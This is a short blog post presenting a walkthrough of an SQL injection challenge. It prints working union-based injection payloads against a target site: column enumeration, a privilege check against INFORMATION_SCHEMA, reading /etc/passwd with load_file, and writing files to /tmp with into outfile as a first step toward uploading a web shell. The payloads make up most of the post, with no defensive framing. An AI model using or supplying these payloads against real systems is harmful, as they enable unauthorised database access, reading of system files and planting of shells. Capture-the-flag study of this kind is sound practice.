Thursday, December 24, 2015

SQLi Challenge Solution 2

Okay First hello to all :p .. The Method is used in this Challenge is Root Privilleges Method.

Okay then let's start :

1. First of all we'll see that site is vuln or not.' > Error :D Text disappeared it means it's vuln

2. Now Time to find which comment is working order by 2222222-- > No error It means we've to try now String Based SQLi' order by 222222--+ > Error :D its working

2. Now We've to Dump Vuln Columns' order by 20--+ > error' order by 15--+ > No error' order by 17--+ > Error' order by 16--+ > No error

So, Total Columns are 16.

Now We've to dump Columns.' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > Vuln Columns is 3

3. Now we've to see that Website have root privilleges or not.

To see it we've to use this query.


Use it in vuln column.' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Yeahhhh :D it's showing root@localhost > Yes it means We've Root Privilleges access.

4. Now We've to Check website path for Upload shell

Users path exist in passwd file So, we'll load that file to see the path. For this we'll use following command :

load_file('/etc/passwd')' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

:'( No luck no path there

5. If You can't able to find the path then remember tmp dir is always writable ^_^

To Upload file in tmp folder we'll use following Command

into outfile '/tmp/test.txt'' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+

6. To Open your uploaded file We'll use load_file' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Wahoooooo :)))) It's working .....

Hope You like my tutorial ( Solution of 2nd Challenge ) .


No comments:

Post a Comment